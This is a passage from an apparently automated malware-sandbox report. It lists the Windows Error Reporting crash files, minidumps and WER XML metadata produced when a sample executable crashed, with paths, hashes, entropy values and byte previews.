                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.6.5.1.8.3.1.7.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.e.6.9.4.f.9.-.d.0.0.b.-.4.4.c.6.-.9.5.5.c.-.c.0.8.0.2.d.c.1.3.c.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.4.1.5.f.6.5.-.c.b.e.9.-.4.e.3.d.-.9.9.b.3.-.d.0.a.7.3.4.a.d.9.c.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nRGKqzVQRt.exe_b852f8d9db928673607680cdcdacfddad4b1959_34ddec4d_edc95a15-6c1f-41e1-bf28-6f154e4f01fb\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):65536
                                                Entropy (8bit):0.8817388898865095
                                                Encrypted:false
                                                SSDEEP:96:o00QYGuGsvhqkoA7Rn6tQXIDcQnc6rCcEhcw3rL+HbHg/8BRTf32rLWIOy4Hov9f:x0QYGuGJM056rAjhszuiF5Z24IO8O
                                                MD5:29F8FA9DE1E520E20A4AEB653584C9C8
                                                SHA1:12AF53EF8FEBFE28129084437433D143BB2E6FBD
                                                SHA-256:557F7724C0CFAEC14D5E2FFD99472B9FC429864306F1D69CCFE6CABF66CF4ACD
                                                SHA-512:11108351686A852786AEFEFEA244AAB2C8F91BE3DB585D8C095912F55B922DA9D501F728E0197B412F363FBB29B67FACA75266D10620113ADEA30B936B4A0102
                                                Malicious:true
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.7.8.4.8.2.4.2.0.0.5.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.c.9.5.a.1.5.-.6.c.1.f.-.4.1.e.1.-.b.f.2.8.-.6.f.1.5.4.e.4.f.0.1.f.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.2.7.3.1.f.e.-.4.6.2.2.-.4.e.9.3.-.9.6.f.e.-.a.7.9.8.5.3.8.e.c.a.f.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.n.R.G.K.q.z.V.Q.R.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.8.c.-.0.0.0.1.-.0.0.1.5.-.4.4.4.2.-.7.f.2.3.2.9.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.d.7.1.0.4.1.4.0.0.f.3.4.0.1.d.a.c.9.9.2.a.a.4.7.d.c.0.a.2.7.0.0.0.0.f.f.f.f.!.0.0.0.0.6.d.f.7.9.1.2.4.6.e.3.c.f.6.6.e.a.c.a.1.2.d.9.8.c.0.d.9.2.a.6.8.6.4.2.3.3.1.6.f.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.7.:.0.2.:.3.4.:.3.3.!.0.!.n.R.G.K.q.z.V.Q.R.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER206B.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:04 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67928
                                                Entropy (8bit):2.318587189313229
                                                Encrypted:false
                                                SSDEEP:384:gfwRsm9baM2b5y8dJdZD2XDglg1Nk2GAlEsuGzrTcmWlv2MebV2UOiyZ:goWubcA8vD2hORmZ1XE2Mu5y
                                                MD5:FB03581A322E0E8F9EC8F07D41ADF9D1
                                                SHA1:A59CC656EB3A8E85466CC74B45529400D42A3761
                                                SHA-256:91B685FEC55576F4ED6C1037E7A4C197F753E7906F4C6DC849E6238F62977D33
                                                SHA-512:801F1C33B9D2D7125E773C975EB122EBC28467AF4DCA37D6AE8EBA3349B1A060CE5E16123D49E00F9A67A315009CBEC2EC85F170C9266C5DC954618CD6465DD5
                                                Malicious:false
                                                Preview:MDMP..a..... .........g........................\................-..........T.......8...........T........... ...8...........X...........D...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2137.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.702007541163776
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxC6ele6Y2D/SU9tyigmfU4npBj89b/ssf7IVm:R6lXJ06t6YSSU9tfgmfU4M//f7n
                                                MD5:B5E291381BD352541151384C798ABA2E
                                                SHA1:F7351999DDDF73E51FB3C2C62C36A689BBA1A7BC
                                                SHA-256:167DDF0C53D0CC448FF693EC79D17F18B435D23936EC9AFB72F62B03CAF50B0B
                                                SHA-512:2D850C5AA4D03A460179A4AC13F4445EBE4B4BD9BDF17A9C92A7805AF9C6A5DE422B5B3A63E28A425CD36629D89CA997463FA8BF7D25B67762F0D28FDAB2D3D9
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2167.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498355926216897
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYwkYm8M4JPGtFkA+q8vZ61wWbxhQd:uIjf6kI7/X7VNJPsKg1ZbxhQd
                                                MD5:B505511D35CAB195918775AF03AE171D
                                                SHA1:E04FB25B492072EBA536C6F814CE83C8589D1202
                                                SHA-256:FF3DB892DA241D4A7A806D4D9AE79866A31FEA2904613DCC3FD8C500ED020425
                                                SHA-512:85EC725130E3752C8859B8D244DD305CAEC1CFDEB00DFC61B44D4729A4ADBD790BD090C4F124F30ED0BC5B6FEC1A8AB7E886206594380EC155AFECF313BBD936
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER233A.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:05 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):67820
                                                Entropy (8bit):2.337176746913463
                                                Encrypted:false
                                                SSDEEP:384:NRsmD/bzs9kLAQ9JdeGXDglW1Nk2GAlEsuGzrTcmWlv2MebV27qa2G:NWa/bdLArGPORmZ1XE2Mu3G
                                                MD5:90B163D10DB8C27464E6A2E62F07ED9B
                                                SHA1:795BCBBC8D80941DD2761B9AE84D162211AC28A3
                                                SHA-256:42D7AEFC56927CEBF065ABCC98755C7B7684CB68AE39B280BC8202F95EE4FE3A
                                                SHA-512:2C32D039FBBA270CEFFB9CC2B8C879CCDCFB581CFB90B4B2A5F7B22CA1D20F8D2F5918F2DF435372DF9BB0E45A984565E3B1F878D04F516B3AA0AC242D2C2348
                                                Malicious:false
                                                Preview:MDMP..a..... .........g........................\................-..........T.......8...........T...............T...........X...........D...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER23F6.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7013623224757275
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxe6W6Y2DQSU9cyWjGgmfU4npBRC89b2ssfk5Sm:R6lXJI6W6Y9SU9cGgmfU4Z72/fC
                                                MD5:C22C8F300AFB07F233E473F06EBFDA65
                                                SHA1:B01C35180022A4264B7B00363225D93514D49E35
                                                SHA-256:127A3AEFA6000F306C1EA85B5607C6E989FA75890ECACE081EE838FECBE35190
                                                SHA-512:C633F55A39FC5EFFA9EB7AD94127D286F87E3E40142E6AEF336C127E5FAA21D1B379DDE910B38849B4CAF8F97A086A0D98768D6224CD95F000184FEA23E4BB17
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2416.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.499154860606887
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYsYm8M4JPGtF9+q8vZ61wWbxhQd:uIjf6kI7/X7VsJPuKg1ZbxhQd
                                                MD5:53352C1331A70C2F6D7DE0CEFCF07FE9
                                                SHA1:CDA215F913E7FB4204897A366C67544DEBE70443
                                                SHA-256:235091B5C3C015C76339DA37759C3648475A7314143AB951B55BE0C3F6D3A122
                                                SHA-512:33CA576900E4AF57902C7C30DF4195B0798790C1D74E27EE3A91273CBE7BFCDF9E2E8F87937798A424605C74B3CC47A64C52F400757E12D6B4B5CF657A125984
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER25D9.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:05 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):73848
                                                Entropy (8bit):2.0542068125685433
                                                Encrypted:false
                                                SSDEEP:384:R7xvOkbJPWQ9JGXoyeAl5TcmWlv2MjbV2fTYEgo:R7tOkbdWNoyeAl5E2MHWR
                                                MD5:764121DEF296C9815797ED101E72E095
                                                SHA1:5EEB71530C49BE09AFE6C0133D02D877F998C3A4
                                                SHA-256:D1AD07E1D82058C88BD5FDC3F2223F46BC35C677D2A2E5BA66AFA17DBA3ECB74
                                                SHA-512:240FDFD1F24E2E41B46FBB49EB87B1C1C17966C6159C0653829F1ACC4F885C013CBD963BF9D2F823AB9ECBB45AB762DBFF95E43898D5EB266015F14258BAE14E
                                                Malicious:false
                                                Preview:MDMP..a..... .........g............T...........\...\.......D....3..........T.......8...........T...........P...(.......................................................................................................eJ......<.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2638.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7015514784046593
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxdA6Gu6Y2DbSU9cyWjGgmfU4npBB89b2ssfnSm:R6lXJc6h6YWSU9cGgmfU4G2/fD
                                                MD5:82DCB20301028ADB28B4897AC66F3700
                                                SHA1:67FE5361D48B91845E06F7F5DE1F6DDC45AF869D
                                                SHA-256:2B7D80521FCBF106BFA559D2E9DF0E43D39880F8944471DDE3DE7218572C9C8B
                                                SHA-512:F5BC280339F4322212100A76A5308D50F016C3DA4D07F38910C978A397F215DAA933BDCD66ED3848115DAD555427CAC9AEBC4B3D6278953B4CC37B14AAFC5548
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2658.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498058242731003
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYRYm8M4JPGtFB+q8vZ61wWbxhQd:uIjf6kI7/X7VxJPWKg1ZbxhQd
                                                MD5:354E929EA4A60301ECB16EA80B853D9E
                                                SHA1:1146CADFB7146F20C5131D0F26916EA868EC39D5
                                                SHA-256:881DE738FFB82A80ADE7E8B152DBAAD3D362FF15179B134574EC8C9416821539
                                                SHA-512:E5CFD4B9703824A6E932DA29CE9233F7CB2AB13CD6D949658673FB0B6D7E4DDCEE6BD042B5AB3EE1345A218B839AA979FC8FC95A17E3C6617A9DAD2F2F2D75C4
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER29A2.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:06 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):73424
                                                Entropy (8bit):2.0658448025077996
                                                Encrypted:false
                                                SSDEEP:384:wxvOHPbMaPEQQDVJKXET5TcmWlv2MjbV2bYUXVf7RQ:wtOvb7PE5DOET5E2MHODq
                                                MD5:8748B10A9BBFE0E0D6DD054A1395F4C6
                                                SHA1:A63B58996455083193A56748DBB8C09640E02BE7
                                                SHA-256:C7405EA42CAD791E548D85A79157B1072EDB2B48D0CA6ED5CD217C370BD64857
                                                SHA-512:C455F737147712A320BDC6BA56FF27773BDA983023C194D3854E6669A845C2D151F0143121A276BC180FB2600E3D41E74EE7711AD204A6E3930DB51288E354A6
                                                Malicious:false
                                                Preview:MDMP..a..... .........g............T...........\...\.......T....3..........T.......8...........T...........P...........................................................................................................eJ......<.......GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A20.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.7018553783975996
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJxD6PQ6Y2DrSU9cyWjGgmfU4npBx89bNssfvbjAvm:R6lXJ1646YGSU9cGgmfU4mN/fvbp
                                                MD5:32A51B02F522B5FF9A3B8D4E3D3976E9
                                                SHA1:E235C4CA4C527E6489253332B28416A4D2D40173
                                                SHA-256:6C839C045AA17333A4F7DAB6D050CA130E2B5D48AA6A17CFB581EBF7E36E7CB4
                                                SHA-512:FDCA9B11174D8501ED0D2E022A7265FEB9B423D73AFB0F5E1C0B8123229CF07CB1B74D8C1CE357D87165B9AB70E6F0B19419019016505CE0EB1453330BF8FCA3
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.2.1.2.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A50.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.498765390720549
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zs6uJg77aI9R2WpW8VYCYm8M4JPGtF6+q8vZ61wWbxhQd:uIjf6kI7/X7VmJPxKg1ZbxhQd
                                                MD5:5759C05C09A6AA68E20B3DD5196D7734
                                                SHA1:AE225A02F0F00EC5DF89BD650D85FA5559715E71
                                                SHA-256:587AC63591836204FBA187FA16154045078C7D48D317CD9395E3A8ECAAEB0AB2
                                                SHA-512:8489D2870C520F62B0D12FA55E3D9608E02282706187F6EC1E4B529F7829042501CF37AF84AC2D04BE604AB9B9A35E3750EBD3F3B5A7E965F4C81A4BEA963D51
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="533846" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DC9.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 02:24:07 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):80488
                                                Entropy (8bit):2.0378424284478593
                                                Encrypted:false
                                                SSDEEP:384:fUQaBs+obXTxR0Q9JqKsGNmWlv2MjbV2+3nbG38LMS:c3BdobDxqkxp2MHjJM
                                                MD5:9B0CC853887A09288AA318DA68D91DF2
